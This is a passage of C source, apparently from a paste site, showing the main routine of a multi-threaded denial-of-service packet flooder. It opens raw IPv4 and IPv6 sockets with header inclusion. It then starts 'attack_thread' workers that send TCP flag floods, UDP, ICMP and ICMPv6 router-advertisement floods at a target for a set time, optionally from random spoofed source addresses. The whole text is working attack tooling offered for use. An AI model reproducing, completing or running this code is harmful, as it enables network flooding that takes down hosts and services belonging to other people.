- thread_data_array[0].window_size = window_size;
- break;
- default:
- usage(argv[0]);
- break;
- }
- }
- if (!thread_data_array[0].timeout) {
- usage(argv[0]);
- }
- if (!thread_data_array[0].src_class) {
- if(thread_data_array[0].flag6 == 1) {
- static char ipstring[3];
- strcat(ipstring, ":");
- thread_data_array[0].src_class = class2ip6(ipstring);
- }
- }
- if ( (!thread_data_array[0].flag4 && !thread_data_array[0].flag6) ||
- (!thread_data_array[0].a_flags) ||
- (!thread_data_array[0].timeout)
- )
- {
- usage(argv[0]);
- }
- if (thread_data_array[0].flag4 == 1 && thread_data_array[0].flag6 == 0) {
- int i;
- for (i = TCP_FIN; i <= ICMP_ECHO_G; i*=2) {
- if ( thread_data_array[i].initialized == 1 ) {
- if ( thread_data_array[i].a_flags <= TCP_FRG ||
- thread_data_array[i].a_flags == RAW_BMB ||
- thread_data_array[i].a_flags == ICMP_ECHO_G
- )
- {
- if ( (thread_data_array[i].socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
- perror("socket");
- exit(-1);
- }
- }
- else if(thread_data_array[i].a_flags == TCP_BMB)
- {
- if ( (thread_data_array[i].socket = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
- perror("socket");
- exit(-1);
- }
- }
- else if (thread_data_array[i].a_flags == UDP_BMB || thread_data_array[i].a_flags == UDP_CFF)
- {
- if ( (thread_data_array[i].socket = socket(AF_INET, SOCK_RAW, IPPROTO_UDP)) < 0) {
- perror("socket");
- exit(-1);
- }
- }
- if (thread_data_array[i].a_flags != UDP_BMB) {
- if (setsockopt(thread_data_array[i].socket, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
- perror("setsockopt");
- exit(-1);
- }
- }
- }
- }
- printf("[IPv4] Packeting (%s) from (%s) with flags (%i) for (%i) seconds.\n\n", thread_data_array[0].dst_class != NULL ? thread_data_array[0].dst_class :inet_ntop(AF_INET,&thread_data_array[0].destination4.sin_addr,thread_data_array[0].DestIP4, sizeof(thread_data_array[0].DestIP4)),thread_data_array[0].src_class != NULL ? thread_data_array[0].src_class :"random",thread_data_array[0].a_flags, thread_data_array[0].timeout);
- printf("[FLAGS] (%d)\n\n", thread_data_array[0].a_flags);
- }
- else if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1) {
- int i;
- for (i = TCP_FIN; i <= ICMP_ECHO_G; i*=2) {
- if ( thread_data_array[i].initialized== 1 ) {
- if (thread_data_array[i].a_flags <= TCP_BMB || thread_data_array[i].a_flags == RAW_BMB) {
- if ( (thread_data_array[i].socket = socket(AF_INET6, SOCK_RAW, IPPROTO_TCP)) < 0) {
- perror("socket");
- exit(-1);
- }
- }
- else if (thread_data_array[i].a_flags == UDP_BMB || thread_data_array[i].a_flags == UDP_CFF)
- {
- if ( (thread_data_array[i].socket = socket(AF_INET6, SOCK_RAW, IPPROTO_UDP)) < 0) {
- perror("socket");
- exit(-1);
- }
- }
- else if (thread_data_array[i].a_flags == ICMP_ECHO_G) {
- if ( (thread_data_array[i].socket = socket(AF_INET6, SOCK_RAW, IPPROTO_ICMPV6)) < 0) {
- perror("socket");
- exit(-1);
- }
- }
- if (thread_data_array[i].a_flags != UDP_BMB) {
- if (setsockopt(thread_data_array[i].socket, IPPROTO_IPV6, IPV6_TCLASS, (char *)&on, sizeof(on)) < 0) {
- perror("setsockopt");
- exit(-1);
- }
- }
- }
- }
- printf("[IPv6] Packeting (%s) from (%s) with flags (%i) for (%i) seconds.\n\n", thread_data_array[0].dst_class != NULL ? thread_data_array[0].dst_class : inet_ntop(AF_INET6,&thread_data_array[0].destination6.sin6_addr,thread_data_array[0].DestIP6, sizeof(thread_data_array[0].DestIP6)),thread_data_array[0].src_class,thread_data_array[0].a_flags,thread_data_array[0].timeout);
- printf("[FLAGS] (%d)\n\n", thread_data_array[0].a_flags);
- }
- signal (SIGINT, handle_exit);
- signal (SIGTERM, handle_exit);
- signal (SIGQUIT, handle_exit);
- thread_data_array[0].start = time(NULL);
- for (i = TCP_FIN; i <= ICMP_ECHO_G; i*=2) {
- if (thread_data_array[i].a_flags == TCP_FIN) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_FIN;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_SYN) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_SYN;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_RST) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_RST;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_PSH) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_PUSH;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0)
- {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_ACK) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_ACK;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0)
- {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_URG) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_URG;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0)
- {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_ECE) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_SYN;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0)
- {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_CWR) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_SYN;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0)
- {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_NOF) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_NOF;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0)
- {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_FRG) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- thread_data_array[i].th_flags = TH_NOF;
- if(pthread_create(&attack_thread[i], NULL, &send_tcp, (void *)&thread_data_array[i]) != 0)
- {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == TCP_BMB) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- if(pthread_create(&attack_thread[i], NULL, &send_bomb, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == UDP_BMB) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- if(pthread_create(&attack_thread[i], NULL, &send_bomb, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == RAW_BMB) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- if(pthread_create(&attack_thread[i], NULL, &send_bomb, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == UDP_CFF) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- if(pthread_create(&attack_thread[i], NULL, &send_udp, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == ICMP_ECHO_G) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- if(pthread_create(&attack_thread[i], NULL, &send_icmp, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- if (thread_data_array[i].a_flags == ICMP6_ROUTERADV) {
- thread_data_array[i].thread = i;
- thread_data_array[i].packets = 0;
- if(pthread_create(&attack_thread[i], NULL, &send_icmp_ra, (void *)&thread_data_array[i]) != 0) {
- printf("+ Thread error:\n");
- perror("- pthread_create()\n");
- }
- }
- }
- for (i = TCP_FIN; i <= ICMP_ECHO_G; i*=2) {
- if(attack_thread[i] != 0)
- pthread_join(attack_thread[i], NULL);
- }
- exit(0);
- }
Add Comment
Please, Sign In to add comment